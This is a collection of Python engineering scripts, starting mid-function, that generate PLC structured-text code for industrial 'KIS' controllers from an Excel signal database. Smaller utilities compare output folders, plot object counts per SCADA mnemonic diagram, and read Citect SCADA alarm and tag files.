print(f'{currentdirname} q {parent_KIS} q {obj_type.replace("?", "q")} q {parent_KIS} q ')
#
try:
f = open(currentdirname + '\\' + parent_KIS + '\\' + obj_type.replace("?", "q") + " " + parent_KIS + '\\' + obj_type.replace("?", "q") + ' ' + parent_KIS + '.txt', 'a+')
except FileNotFoundError:
os.mkdir(currentdirname + '\\' + parent_KIS + '\\' + obj_type.replace("?", "q") + " " + parent_KIS)
f = open(currentdirname + '\\' + parent_KIS + '\\' + obj_type.replace("?", "q") + " " + parent_KIS + '\\' + obj_type.replace("?", "q") + ' ' + parent_KIS + '.txt', 'a+')
# Если файл пустой, сделать header
f.seek(0, os.SEEK_END) # go to end of file
if f.tell(): # if current position is truish (i.e != 0)
f.seek(0) # rewind the file for later use
else:
f.write(f'(*----------- {parent_KIS} обработка объекта {obj_type} {datetime.now().strftime("%Y_%m_%d %H:%M:%S")} --------------------*)\n\n')
no_AI = 0
ai_module = 0
ai_channel = 0
ai_EU = 0
ai_scale_min = 0
ai_scale_max = 0
ai_rakurs_index = 0
ai_sign_name = 0
ai_klemma = 0
if obj_type == "Сигн AI":
try:
ai_module = data.loc[data["Вход блока"] == "In"]["Номер модуля"].values[0]
ai_channel = data.loc[data["Вход блока"] == "In"]["Канал модуля"].values[0]
ai_EU = data.loc[data["Вход блока"] == "In"]["Единицы измер параметра"].values[0]
ai_scale_min = data.loc[data["Вход блока"] == "In"]["нижн предел парам"].values[0]
ai_scale_max = data.loc[data["Вход блока"] == "In"]["верхний предел парам"].values[0]
ai_rakurs_index = data.loc[data["Вход блока"] == "In"]["Ракурс индекс"].values[0]
ai_sign_name = data.loc[data["Вход блока"] == "In"]["Наименование сигн"].values[0]
ai_klemma = data.loc[data["Вход блока"] == "In"]["Номер клемника и клеммы"].values[0]
# Добавить запись по объекту
## Заголовок
f.write(f"(*____{obj_name}_____ {ai_module} CH_[{ai_channel}] eдиницы измерения параметра {ai_EU} объект {object_counter[KISes.index(parent_KIS)][list(foo_switcher.keys()).index(obj_type)]}*)\n")
no_AI = 0
except IndexError:
logerror(f'Sign AI {obj_name} не содержит AI сигнала')
f.write(f"(*____{obj_name}_____ БЕЗ AI ] объект {object_counter[KISes.index(parent_KIS)][list(foo_switcher.keys()).index(obj_type)]}*)\n")
no_AI = 1
for inp in block_inputs:
if inp != "In":
try:
module = data.loc[data["Вход блока"] == inp]["Номер модуля"].values[0]
channel = data.loc[data["Вход блока"] == inp]["Канал модуля"].values[0]
sign_KIS = data.loc[data["Вход блока"] == inp]["Номер КИС"].values[0]
rakurs_index = data.loc[data["Вход блока"] == inp]["Ракурс индекс"].values[0]
sign_name = data.loc[data["Вход блока"] == inp]["Наименование сигн"].values[0]
klemma = data.loc[data["Вход блока"] == inp]["Номер клемника и клеммы"].values[0]
if channel == 'не опред' or module == 'A0СУ':
logerror(f'не определен канал или модуль для {rakurs_index}')
continue
if parent_KIS == sign_KIS:
f.write(f'{obj_name}_DI.{inp}:={module}_DI{"%.02d" % channel}.STS; (* {rakurs_index}, {sign_name} *)(*{klemma}*)\n')
else:
try:
array_element_in = int(
data.loc[data["Вход блока"] == inp]["Номер элемента в массиве пересылки"].values[0])
except ValueError:
f.write(f'{obj_name}_DI.{inp}:=ZeroByte; (*ВНИМАНИЕ! ЗДЕСЬ БЫЛА ОШИБКА В БАЗЕ, УСТРАНИТЬ И ОБРАТИТЬ ВНИМАНИЕ*)\n')
logerror(f'не определен номер элемента в массиве пересылки для {rakurs_index}')
continue
# Выставление соответствия номеров массивов (посылка Modbus TCP содержит не более 250 переменных BYTE)
if array_element_in > 249:
data_array_number = 2
array_element_for = array_element_in - 250
else:
data_array_number = 1
array_element_for = array_element_in
f.write(f'{obj_name}_DI.{inp}:={sign_KIS.replace("КИС", "KIS").replace(".", "_")}.Inputs.{sign_KIS.replace("КИС", "KIS").replace(".", "_")}_IN[{array_element_in}]; (*FOR_{parent_KIS.replace("КИС", "KIS").replace(".", "_")}_DATA0{data_array_number}[{array_element_for}]:= {module}_DI{"%.02d" % channel}.STS;*)(*{klemma}*)\n')
with open(currentdirname + '\\' + sign_KIS + '\\!' + sign_KIS + 'Массив пересылок.txt', 'a+') as outfile:
outfile.seek(0, os.SEEK_END) # go to end of file
if outfile.tell(): # if current position is truish (i.e != 0)
outfile.seek(0) # rewind the file for later use
else:
outfile.write(f'(*----------- массив пересылки из {sign_KIS} {datetime.now().strftime("%Y_%m_%d %H:%M:%S")} --------------------*)\n\n')
outfile.write(f'FOR_{parent_KIS.replace("КИС", "KIS").replace(".", "_")}_DATA0{data_array_number}[{array_element_for}]:= {module}_DI{"%.02d" % channel}.STS;(*{obj_name} {inp} из {sign_KIS} в {parent_KIS} {module} {channel} *)\n')
except (KeyError, IndexError) as e:
pass
f.write(f'{obj_name}_block (UDT :={obj_name},\n')
if no_AI:
f.write(f' In:=Empty_AI, (* Без АИ*)\n')
f.write(f' Scale_min := 0.0,\n')
f.write(f' Scale_max := 0.0,\n')
else:
f.write(f' In:={ai_module}.ANA_CH_IN[{ai_channel}], (* {ai_rakurs_index}, {ai_sign_name} *)(*{ai_klemma}*)\n')
f.write(f' Scale_min := {ai_scale_min},\n')
f.write(f' Scale_max := {ai_scale_max},\n')
try:
f.write(f' Address := {ai_module[len(ai_module)-2::]}.{ai_channel},\n')
except TypeError:
f.write(f' Address := 0.0,\n')
f.write(f' DI := {obj_name}_DI);\n\n')
else:
# Добавить запись по объекту
## Заголовок
f.write(f"(*____{obj_name}_____ объект {object_counter[KISes.index(parent_KIS)][list(foo_switcher.keys()).index(obj_type)]}*)\n")
# Записываем объект
f.write(f'{obj_name}_block (UDT :={obj_name},\n')
if "In" in block_inputs:
ai_module = data.loc[data["Вход блока"] == "In"]["Номер модуля"].values[0]
ai_channel = data.loc[data["Вход блока"] == "In"]["Канал модуля"].values[0]
ai_rakurs_index = data.loc[data["Вход блока"] == "In"]["Ракурс индекс"].values[0]
ai_sign_name = data.loc[data["Вход блока"] == "In"]["Наименование сигн"].values[0]
f.write(f' {"In"}:={ai_module}.ANA_CH_IN[{ai_channel}], (* {ai_rakurs_index}, {ai_sign_name} *)\n')
scale_min = data.loc[data["Вход блока"] == "In"]["нижн предел парам"].values[0].replace(',', '.')
scale_max = data.loc[data["Вход блока"] == "In"]["верхний предел парам"].values[0].replace(',', '.')
try:
f.write(f' Address := {ai_module[len(ai_module)-2::]}.{ai_channel},\n')
except TypeError:
f.write(f' Address := 0.0,\n')
f.write(f' Scale_min := {scale_min},\n')
f.write(f' Scale_max := {scale_max});\n\n')
else:
for inp in block_inputs:
try:
sign_KIS = data.loc[data["Вход блока"] == inp]["Номер КИС"].values[0]
module = data.loc[data["Вход блока"] == inp]["Номер модуля"].values[0]
rakurs_index = data.loc[data["Вход блока"] == inp]["Ракурс индекс"].values[0]
channel = data.loc[data["Вход блока"] == inp]["Канал модуля"].values[0]
sign_name = data.loc[data["Вход блока"] == inp]["Наименование сигн"].values[0]
if channel == 'не опред' or module == 'A0СУ':
logerror(f'не определен канал или модуль для {rakurs_index}')
continue
if parent_KIS == sign_KIS:
if inp == "In": # AI
f.write(f' {inp}:={module}.ANA_CH_IN[{channel}], (* {rakurs_index}, {sign_name} *)\n')
scale_min = data.loc[data["Вход блока"] == inp]["нижн предел парам"].values[0].replace(',', '.')
scale_max = data.loc[data["Вход блока"] == inp]["верхний предел парам"].values[0].replace(',', '.')
f.write(f' Scale_min := {scale_min},\n')
f.write(f' Scale_max := {scale_max});\n\n')
continue
else:
f.write(f' {inp}:={module}_DI{"%.02d" % channel}.STS, (* {rakurs_index}, {sign_name} *)\n')
else:
try:
array_element_in = int(data.loc[data["Вход блока"] == inp]["Номер элемента в массиве пересылки"].values[0])
except ValueError:
f.write(f' {inp}:=ZeroByte, (*ВНИМАНИЕ! ЗДЕСЬ БЫЛА ОШИБКА В БАЗЕ, УСТРАНИТЬ И ОБРАТИТЬ ВНИМАНИЕ*)\n')
logerror(f'не определен номер элемента в массиве пересылки для {rakurs_index}')
continue
# Выставление соответствия номеров массивов (посылка Modbus TCP содержит не более 250 переменных BYTE)
if array_element_in > 249:
data_array_number = 2
array_element_for = array_element_in - 250
else:
data_array_number = 1
array_element_for = array_element_in
f.write(f' {inp}:={sign_KIS.replace("КИС", "KIS").replace(".", "_")}.Inputs.{sign_KIS.replace("КИС", "KIS").replace(".", "_")}_IN[{array_element_in}], (*FOR_{parent_KIS.replace("КИС", "KIS").replace(".", "_")}_DATA0{data_array_number}[{array_element_for}]:= {module}_DI{"%.02d" % channel}.STS; {rakurs_index}, {sign_name}*)\n')
with open(currentdirname + '\\' + sign_KIS + '\\!' + sign_KIS + 'Массив пересылок.txt', 'a+') as outfile:
outfile.seek(0, os.SEEK_END) # go to end of file
if outfile.tell(): # if current position is truish (i.e != 0)
outfile.seek(0) # rewind the file for later use
else:
outfile.write(f'(*----------- массив пересылки из {sign_KIS} {datetime.now().strftime("%Y_%m_%d %H:%M:%S")} --------------------*)\n\n')
outfile.write( f'FOR_{parent_KIS.replace("КИС", "KIS").replace(".", "_")}_DATA0{data_array_number}[{array_element_for}]:= {module}_DI{"%.02d" % channel}.STS;(*{obj_name} {inp} из {sign_KIS} в {parent_KIS} {module} {channel} *)\n')
except (KeyError, IndexError) as e:
f.write(f' {inp}:=ZeroByte,\n')
f.write(' TimeCtrl := t#5m);\n\n')
## Итерируем счетчик
object_counter[KISes.index(parent_KIS)][list(foo_switcher.keys()).index(obj_type)] = object_counter[KISes.index(parent_KIS)][list(foo_switcher.keys()).index(obj_type)] + 1
f.close()
if __name__ == '__main__':
KISes = [
"КИС320.1",
"КИС336.1",
"КИС336.2",
"КИС336.3",
"КИС420.1",
"КИС420.2",
"КИС420.3",
"КИС420.4",
"КИС420.5",
"КИС420.6",
"КИС420.7"]
object_types = [
"Клапан",
"Электронагреватель",
"AI",
"AI_Sign",
"Электрофорезный фильтр",
"Фильтр рулонный",
"КИД",
"МЕО1",
"Сигнализатор",
"Вентилятор",
"Избиратель",
"Контактный аппарат",
"Мешалка",
"Насос",
"Шибер"]
foo_switcher = {
"Клапан": [
"OP",
"CL",
"Local",
"Remoute",
"Power_En",
"CMD_OP_GCHU",
"CMD_CL_GCHU",
"CMD_STP_GCHU",
"CMD_OP_RCHU",
"CMD_CL_RCHU",
"CMD_STP_RCHU",
"Auto_mode",
"Man_mode"],
'el_nagr': [
"Run",
"Cmd_Strt_Local",
"Cmd_Strt_Rchu"],
"AI": ["In"],
"AI_complicate": [
"Limit4_H",
"Limit9_L_PS2",
"Limit10_LL_PS2_Dis",
"Limit7_L_Dis",
"Limit8_LL_Dis",
"Limit4_H_Dis",
"Limit8_LL",
"Limit10_LL_PS2",
"Limit7_L",
"Limit9_L_PS2_Dis",
"Limit1_HH_PS2",
"Limit1_HH_PS2_Dis",
"Limit3_HH",
"Limit3_HH_Dis",
"Limit3_HH_Cmd",
"Limit8_LL_Cmd",
"Limit10_LL_PS2_Cmd",
"Limit4_H_Cmd",
"Limit1_HH_PS2_Cmd",
"Limit7_L_Cmd",
"Limit9_L_PS2_Cmd",
"Power_En",
"Limit2_H_PS2",
"Limit2_H_PS2_Cmd",
"Limit2_HH_PS2_Dis",
"In"],
"Сигн AI": [
"Limit3_HH_Cmd",
"Limit4_H_Cmd",
"Limit7_L",
"Limit4_H",
"Limit4_H_Dis",
"Limit3_HH_Dis",
"Limit3_HH",
"Limit7_L_Dis",
"Limit8_LL_Dis",
"Limit8_LL",
"Limit7_L_Cmd",
"Limit8_LL_Cmd",
"Limit9_L_PS2_Cmd",
"Limit6_Ln",
"Limit6_Ln_Dis",
"Limit6_Ln_Cmd",
"Limit5_Hn",
"Power_En",
"Limit2_HH_PS2_Dis",
"Limit2_H_PS2",
"Limit2_H_PS2_Cmd",
"Limit10_LL_PS2_Cmd",
"Limit5_Hn_Cmd",
"Limit9_L_PS2",
"Limit10_LL_PS2",
"Limit9_L_PS2_Dis",
"Limit10_LL_PS2_Dis",
"In"],
"Сигн AI ??": [
"Limit3_HH_Cmd",
"Limit4_H_Cmd",
"Limit7_L",
"Limit4_H",
"Limit4_H_Dis",
"Limit3_HH_Dis",
"Limit3_HH",
"Limit7_L_Dis",
"Limit8_LL_Dis",
"Limit8_LL",
"Limit7_L_Cmd",
"Limit8_LL_Cmd",
"Limit9_L_PS2_Cmd",
"Limit6_Ln",
"Limit6_Ln_Dis",
"Limit6_Ln_Cmd",
"Limit5_Hn",
"Power_En",
"Limit2_HH_PS2_Dis",
"Limit2_H_PS2",
"Limit2_H_PS2_Cmd",
"Limit10_LL_PS2_Cmd",
"Limit5_Hn_Cmd",
"Limit9_L_PS2",
"Limit10_LL_PS2",
"Limit9_L_PS2_Dis",
"Limit10_LL_PS2_Dis"
"In"],
"Elektroforez": [
"Limit7_L",
"Limit8_LL",
"On_Perepolus",
"On_Rabota"],
"flt_rulon": [
"Run",
"Remoute",
"Local",
"Cmd_Strt_Gchu",
"Cmd_Strt_Local"],
'kid': [
"Cmd_Cl_Gchu",
"Cmd_Op_Gchu",
"Power_En_Rchu",
"CL",
"OP",
"Remoute",
"Power_En_Cho"],
'meo_1': [
"na_back",
"na_forw"],
'NO': [],
"Signalizator": ["Sign"],
"вентилятор": [
"Cmd_Strt_Rchu",
"Man_Mode",
"Run",
"Local",
"Remoute",
"Pozar_Run",
"Avaria_Stp",
"Stp",
"Auto_Mode",
"Auto_Main_On",
"No_Power_En",
"Cmd_Strt_Local",
"Klapan_Cl",
"Avaria_Off",
"Klapan_Op",
"Auto_Back_On",
"Remoute_On"],
"вентилятор ??": [
"Cmd_Strt_Rchu",
"Man_Mode",
"Run",
"Local",
"Remoute",
"Pozar_Run",
"Avaria_Stp",
"Stp",
"Auto_Mode",
"Auto_Main_On",
"No_Power_En",
"Cmd_Strt_Local",
"Klapan_Cl",
"Avaria_Off",
"Klapan_Op",
"Auto_Back_On",
"Remoute_On"],
"избиратель": [
"Manual_mode",
"Auto_Mode"],
"Контактный аппарат": [
"Man_Mode_2",
"Cmd_Strt_Gchu_2",
"Auto_Mode_2",
"Man_Mode_1",
"Cmd_Strt_Gchu_1",
"Auto_Mode_1",
"Cmd_Stp_Rchu_2",
"Cmd_Stp_Rchu_1",
"Cmd_Strt_Rchu_2",
"Cmd_Strt_Rchu_1",
"Run_2",
"Run_1",
"On_Run_1",
"Power_En",
"On_Stp_1",
"Cmd_Stp_Gchu_1",
"Cmd_Stp_Gchu_2",
"Power_En_1",
"Power_En_2",
"Main_Mode_1",
"Main_Mode_2"],
"мешалка": [
"Run",
"Local",
"Remoute",
"Cmd_On"],
"Насос": [
"Cmd_Strt_Rchu",
"Cmd_Stp_Rchu",
"Cmd_Strt_Gchu",
"Cmd_Stp_Gchu",
"Main_Mode",
"Cmd_Stp_Local",
"Auto_Mode",
"Local",
"Remoute",
"Backup_Mode",
"Run",
"Power_En",
"Auto_Main_On",
"Membrana",
"Stp",
"Auto_Back_On",
"Cmd_Strt_Local",
"Man_Mode"],
"Насос ??": [
"Cmd_Strt_Rchu",
"Cmd_Stp_Rchu",
"Cmd_Strt_Gchu",
"Cmd_Stp_Gchu",
"Main_Mode",
"Cmd_Stp_Local",
"Auto_Mode",
"Local",
"Remoute",
"Backup_Mode",
"Run",
"Power_En",
"Auto_Main_On",
"Membrana",
"Stp",
"Auto_Back_On",
"Cmd_Strt_Local",
"Man_Mode"],
"Насос ??": [
"Cmd_Strt_Rchu",
"Cmd_Stp_Rchu",
"Cmd_Strt_Gchu",
"Cmd_Stp_Gchu",
"Main_Mode",
"Cmd_Stp_Local",
"Auto_Mode",
"Local",
"Remoute",
"Backup_Mode",
"Run",
"Power_En",
"Auto_Main_On",
"Membrana",
"Stp",
"Auto_Back_On",
"Cmd_Strt_Local",
"Man_Mode"],
"РЕЗЕРВ": [],
"Шибер": []
}
outputdirectory = r'C:\Users\1\Desktop\PLC code'
currentdirname = outputdirectory + '\\' + datetime.now().strftime("%Y_%m_%d %H_%M")
try:
os.makedirs(currentdirname) # Создаем общую папку для всех папок
except FileExistsError:
currentdirname = currentdirname + '(2)'
os.makedirs(currentdirname)
for KIS in KISes:
os.mkdir(currentdirname + '\\' + KIS)
object_counter = [[1] * len(foo_switcher.keys()) for _ in range(len(KISes))]
starttime = datetime.now()
inputfile = r'C:\Users\1\Desktop\Работа\ПИК\!РАКУРС\!!ПО\Базы с сигналами\WORK_10998_20_11_17.xlsm'
sheetname = 'Лист1'
df = importdf(inputfile, sheetname)
# Заполнить строку с номерами элементов в массиве пересылки
df['Номер элемента в массиве пересылки'] = ''
df.sort_values(by=['Наименов_0'])
df1 = df.loc[df['Не использовать сигнал'] != 1]
array_indexes = {
"КИС320.1": 0,
"КИС336.1": 0,
"КИС336.2": 0,
"КИС336.3": 0,
"КИС420.1": 0,
"КИС420.2": 0,
"КИС420.3": 0,
"КИС420.4": 0,
"КИС420.5": 0,
"КИС420.6": 0,
"КИС420.7": 0}
arr_index_KIS = [0] * len(KISes)
for i in range(0, len(KISes)):
arr_index_KIS[i] = array_indexes.copy()
for index, row in df1.iterrows():
if row['Номер КИС'] != row['Номер КИС к родителю'] and "КИС" in str(row['Номер КИС к родителю']):
df1.at[index, 'Номер элемента в массиве пересылки'] = arr_index_KIS[KISes.index(row['Номер КИС'])][row['Номер КИС к родителю']] # =array_indexes[row['Номер КИС к родителю']]
arr_index_KIS[KISes.index(row['Номер КИС'])][row['Номер КИС к родителю']] = arr_index_KIS[KISes.index(row['Номер КИС'])][row['Номер КИС к родителю']] + 1
naimen_0 = df1["Наименов_0"].unique().tolist()
naimen_0 = [x for x in naimen_0 if str(x) != 'nan'] # Убираем NaN
total = len(naimen_0) - 1
for nomer, name in enumerate(naimen_0):
type_inputs = foo_switcher.get(df1.loc[df1['Наименов_0'] == name]['Тип объекта'].values[0], "Fail")
if type_inputs == "Fail":
logerror(f'{name} имеет неправильный тип')
continue
if df1.loc[df1['Наименов_0'] == name]['Номер КИС'].values[0] not in KISes:
logerror(f'{name} имеет неправильный номер КИС')
continue
raw_data = df1.loc[df1['Наименов_0'] == name]
data_without_bad_signs = raw_data.loc[raw_data['Не использовать сигнал'] != '1']
if len(data_without_bad_signs.index) > 0:
foo(data_without_bad_signs, foo_switcher.get(data_without_bad_signs['Тип объекта'].values[0]))
print("Экспорт датафрейма в файл...")
df1.to_excel(currentdirname + r"\output.xlsx")
endtime = datetime.now()
minutes = divmod((endtime-starttime).seconds, 60)
print('Время выполнения программы ', minutes[0], ' минут ', minutes[1], ' секунд')
<file_sep># Гистограмма количества привязанных объектов к мнемосхемам
import glob
import os
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
inputfile = r'C:\Users\1\Desktop\Работа\ПИК\!РАКУРС\!!ПО\Базы с сигналами\Сводная по мнемосхемам.xlsx'
objfile = r'C:\Users\1\Desktop\MS_objects\ '
df = pd.read_excel(inputfile, sheet_name='Данные')
df['MS_fact'] = ''
files = glob.glob(os.path.join(objfile[:-1], '*.txt'))
for file in files:
f = open(file, 'r')
f1 = f.readlines()
for i in range(0, len(f1)):
f1[i] = f1[i].replace('\n', '')
for row in f1:
df["MS_fact"] = np.where(df['Наименов_0'] == row, df["MS_fact"] + format(os.path.basename(file))[:4], df["MS_fact"])
f.close()
z = df.loc[df["Уникальное значение"] == 1, "MS_fact"].value_counts()
data = pd.DataFrame()
for i in range(1, 45):
newrow = {"MS": 'MS'+'{:02d}'.format(i), "count": 0}
data = data.append(newrow, ignore_index=True)
for row in z.keys():
duplicated = []
for foo in [row[i:i + 4] for i in range(0, len(row), 4)]:
if foo in duplicated:
continue
else:
duplicated.append(foo)
data.loc[data["MS"] == foo, 'count'] = data.loc[data["MS"] == foo, 'count'] + z[row]
fig, ax = plt.subplots(figsize=(14, 10))
for i, v in enumerate(data['count']):
ax.text(v + 1, i, "{:.0f}".format(v), color='tomato')
ax.barh(data.MS, data["count"], left=0, height=0.5, color="tomato")
ax.set_yticklabels(data.MS, minor=False)
plt.title('Количество привязанных объектов к мнемосхемам')
plt.xlabel('Количество, шт.')
plt.ylabel('Мнемосхема')
plt.show()
<file_sep>path = r'C:\Users\1\Desktop\Работа\ПИК\!РАКУРС\!!ПО\Объекты\Электронагреватель\el_nagr_TXT\ '
filenames = [["KIS_336_1", 1],
["KIS_336_2", 1],
["KIS_336_3", 1],
["KIS_320_1", 0],
["KIS_420_1", 1],
["KIS_420_2", 1],
["KIS_420_3", 1],
["KIS_420_4", 1],
["KIS_420_5", 1],
["KIS_420_6", 1],
["KIS_420_7", 1]]
# filename = path + r'KIS_420_7_Ventilator'
for filename in filenames:
if filename[1] == 1:
outputfile = path[:-1] + filename[0] + '_analyzed.txt'
f = open(path[:-1] + filename[0] + '_Nasos' + '.txt', "r")
list_of_blocks = []
for x in f:
if "_block" in x:
list_of_blocks.append(x.split("_block")[0])
f.close()
print(list_of_blocks)
print(list_of_blocks.__len__())
f = open(outputfile, "w")
for row in list_of_blocks:
f.write(row+'\n')
<file_sep>import os
from os import listdir
from os.path import isfile, join
def diff(list1, list2):
return (list(list(set(list1)-set(list2)) + list(set(list2)-set(list1))))
directory1 = r'C:\Users\1\Desktop\PLC code\2020_08_24 13_56'
dirlist1 = [x[0] for x in os.walk(directory1)]
directory2 = r'C:\Users\1\Desktop\PLC code\2020_08_24 17_22'
dirlist2 = [x[0] for x in os.walk(directory2)]
# difdirrlist1 = list(map(lambda x: x.replace(directory1, ""), dirlist1))
# difdirrlist2 = list(map(lambda x: x.replace(directory2, ""), dirlist2))
# print(diff(difdirrlist1, difdirrlist2))
allfiles1 = []
allfiles2 = []
difference = []
for folder in dirlist1:
onlyfiles = [f for f in listdir(folder) if isfile(join(folder, f))]
for n, i in enumerate(onlyfiles):
onlyfiles[n] = folder + '\\' + onlyfiles[n]
allfiles1.append(onlyfiles)
for folder in dirlist2:
onlyfiles = [f for f in listdir(folder) if isfile(join(folder, f))]
for n, i in enumerate(onlyfiles):
onlyfiles[n] = folder + '\\' + onlyfiles[n]
allfiles2.append(onlyfiles)
for file in allfiles1:
try:
with open(file[0], 'r') as f1:
next(f1)
text1 = ''
for line in f1:
text1 = text1 + line
except FileNotFoundError:
print(f'Нет файла {file[0]}')
try:
with open(file[0].replace(directory1, directory2), 'r') as f2:
next(f2)
text2 = ''
for line in f2:
text2 = text2 + line
except (FileNotFoundError, StopIteration) as e:
print(f'Нет файла {file[0].replace(directory1, directory2)}')
if text1 != text2:
difference.append(file[0])
print(f'Разница между версий в файлах: {difference}')
<file_sep>import pandas as pd
import re
inputfile = r'C:\Users\1\Desktop\input_AI\file.txt'
outputfile = r'C:\Users\1\Desktop\input_AI\file.xlsx'
f = open(inputfile, 'r')
name = 'fail'
EU = 'fail'
min_scale = 'fail'
max_scale = 'fail'
index = 0
df = pd.DataFrame(columns=['Наименов_0', 'Min_Scale', 'Max_Scale', 'EU'])
for line in f:
if 'UDT :=' in line:
if name != 'fail':
df.at[index, 'Наименов_0'] = name
df.at[index, 'Min_Scale'] = min_scale
df.at[index, 'Max_Scale'] = max_scale
df.at[index, 'EU'] = EU
index = index + 1
name = line.split('_block')[0].split('(')[0].replace(',', '').replace(';', '').replace(')', '').strip()
if 'Scale_min' in line:
min_scale = line.split(':=')[1].split('(')[0].replace(',', '').replace(';', '').replace(')', '').strip()
if 'Scale_max' in line:
max_scale = line.split(':=')[1].split('(')[0].replace(',', '').replace(';', '').replace(')', '').strip()
if 'eдиницы измерения параметра' in line:
try:
EU = re.search(r'\[.{1,10}\]', line.split('eдиницы измерения параметра')[1]).group(0)[1:-1].strip()
except AttributeError:
pass
df.at[index, 'Наименов_0'] = name
df.at[index, 'Min_Scale'] = min_scale
df.at[index, 'Max_Scale'] = max_scale
df.at[index, 'EU'] = EU
index = index + 1
fyv = df.loc[df['Наименов_0'] == "Y0A01010_0"]["EU"]
df.to_excel(outputfile)
f.close()
<file_sep>import glob
import os
folder = r'C:\Users\rangin\Desktop\MS_tags\ '
folderobj = r'C:\Users\rangin\Desktop\MS_objects\ '
files = glob.glob(os.path.join(folder[:-1], '*.txt'))
for file in files:
inputfile = open(file, 'r')
outputfile = open(folderobj[:-1] + file.split("\\")[-1], 'w+')
inputlist = []
ilist = []
forbidden_combos = ('ST01', 'RG01', 'AM01', 'ST02', 'ST03', 'RJ01', 'AM02', 'AM03')
forbidden_combos = tuple([x+'\n' for x in forbidden_combos])
for line in inputfile:
ilist.append(line)
for line in ilist:
if line.split('_')[:2] in inputlist:
continue
else:
try:
if not line.split('_')[1].endswith(forbidden_combos):
inputlist.append(line.split('_')[:2])
except IndexError:
continue
for line in inputlist:
if line.__len__() > 1:
outputfile.write(line[0] + '_' + line[1] + '\n')
else:
outputfile.write(line[0] + '\n')
<file_sep>import pandas as pd
class Valve:
def __init__(self, name):
self.name = name # instance variable unique to each instance
OP = ""
CL = ""
Remote = ""
Local = ""
Power_En = ""
Auto_Mode = ""
Man_Mode = ""
CMD_OP_GCHU = ""
CMD_CL_GCHU = ""
CMD_OP_RCHU = ""
CMD_CL_RCHU = ""
CMD_STP_RCHU = ""
CMD_STP_GCHU = ""
vhodblokatocode = {"OP":"",
"CL":"",
"Local":"",
"Remoute":"",
"Power_En":"",
"CMD_OP_GCHU":"",
"CMD_CL_GCHU":"",
"CMD_STP_GCHU":"",
"CMD_OP_RCHU":"",
"CMD_CL_RCHU":"",
"CMD_STP_RCHU":"",
"Auto_mode":"",
"Man_mode": "",
}
def fill(self, dataframe):
for index, row in dataframe:
if
df = pd.DataFrame([["Valve", "KIS336.1 A036 1", "Local"],
["Valve", "KIS336.1 A036 2", "Remoute"],
["Valve", "KIS336.1 A036 3", "OP"],
["Valve", "KIS336.1 A036 4", "CL"],
["Valve", "KIS336.1 A036 5", "Power_En"],
["Valve", "KIS336.1 A036 6", "Auto_mode"],
["Valve", "KIS336.1 A036 7", "Man_mode"],
["Valve", "KIS336.1 A036 8", "CMD_OP_GCHU"]],
columns=['Type', 'NeededData', 'Vhod bloka'])
print(0)
VC01S01 = Valve("Valve")
VC01S01.fill(df)
<file_sep>import pandas as pd
def importdf(filename, sheet):
dataframe = pd.read_excel(filename, sheet_name=sheet)
return dataframe
inputfile = r'C:\Users\1\Desktop\Работа\ПИК\!РАКУРС\!!ПО\Базы с сигналами\Копия WORK_10998_from 19дек 13-40+Сводная.xlsx'
outputfile = r'C:\Users\1\Desktop\Работа\ПИК\!РАКУРС\!!ПО\Базы с сигналами\WORK_10998_from 14авг 13-00+Сводная.xlsx'
sheetname = 'Лист1'
df = importdf(inputfile, sheetname)
df['Номер элемента в массиве пересылки'] = ''
df.sort_values(by=['Код'])
indexes = {
"КИС320.1": 0,
"КИС336.1": 0,
"КИС336.2": 0,
"КИС336.3": 0,
"КИС420.1": 0,
"КИС420.2": 0,
"КИС420.3": 0,
"КИС420.4": 0,
"КИС420.5": 0,
"КИС420.6": 0,
"КИС420.7": 0}
for index, row in df.iterrows():
if row['Номер КИС'] != row['Номер КИС к родителю'] and "КИС" in str(row['Номер КИС к родителю']):
df.at[index, 'Номер элемента в массиве пересылки'] = indexes[row['Номер КИС к родителю']]
indexes[row['Номер КИС к родителю']] = indexes[row['Номер КИС к родителю']] + 1
df.to_excel(inputfile, sheet_name=sheetname)
print(indexes)
<file_sep>import difflib
file1 = open(r'C:\Users\1\Desktop\PLC code\2020_08_19 12_11(2)\КИС320.1\AI КИС320.1\AI КИС320.1.txt', 'r')
file2 = open(r'C:\Users\1\Desktop\PLC code\2020_08_19 11_41\КИС320.1\!КИС320.1Массив пересылок.txt', 'r')
diff = difflib.ndiff(file1.readlines()[2:], file2.readlines()[2:])
delta = ''.join(x for x in diff)
# print(delta)
print(difflib.SequenceMatcher(None, file1.readlines()[2:], file2.readlines()[2:]).ratio())
file2.close()
file1.close()
<file_sep># ! /usr/bin/python
# https://www.python.org/download/releases/2.7.6
# http://sourceforge.net/projects/dbfpy/files/dbfpy/2.2.5/
# import Tkinter, Tkconstants, tkFileDialog
import sys, os
import re, glob
# from dbfpy import dbf
from dbfread import DBF
import string
def GetProjectDirectory():
# Tkinter.Tk().withdraw() # we don't want a full GUI, so keep the root window from appearing
# folder = tkFileDialog.askdirectory() # show an "Open" dialog box and return the path to the selected file
folder = r'C:\ProgramData\Schneider Electric\Citect SCADA 2016\User\Current_2021_05_26'
if len(folder) < 3:
raise Exception("No directory specified in GUI")
return folder
def getAlarms(folder):
# Get Alarms
# anaalm.dbf
# digalm.dbf
# hardalm.dbf
# hresalm.dbf
# advalm.dbf
# *alm.dbf
alarms = dict()
# pat = re.compile(r'^(ana|dig|hard|hres|adv)alm\.dbf$',re.IGNORECASE)
# for item in os.listdir(folder):
# if pat.match(item):
# alarmfiles.append(item)
alarmfiles = glob.glob(os.path.join(folder, '*alm.dbf'))
print("Found {0} alarm files.\n".format(len(alarmfiles)))
for almType in alarmfiles:
# db = dbf.Dbf(almType, new=False)
db = DBF(alarms, encoding='cp1251', load=True)
alarms[almType] = []
for rec in db:
alarms[almType].append(rec.asDict())
print("Found {0} alarm{2} in {1}".format(len(alarms[almType]), almType, 's' if (len(alarms[almType]) == 0 or len(alarms[almType]) > 1) else ''))
return alarms
def getTags(folder):
# Get Tags
# variable.dbf
tags = list()
tagfiles = glob.glob(os.path.join(folder, 'variable.dbf'))
print("Found {0} tag files.\n".format(len(tagfiles)))
for tagfile in tagfiles:
# db = dbf.Dbf(tagfile, new=False)
db = DBF(tagfile, encoding='cp1251', load=True)
for rec in db:
# tags.append(rec.asDict())
tags.append(rec)
print("Found {0} tag{2} in {1}".format(len(tags), tagfile, 's' if (len(tags) == 0 or len(tags) > 1) else ''))
return tags
def listPages(folder, includePath=True):
# *.rdb files whose name starts with an underscore don't seem to directly map to pages
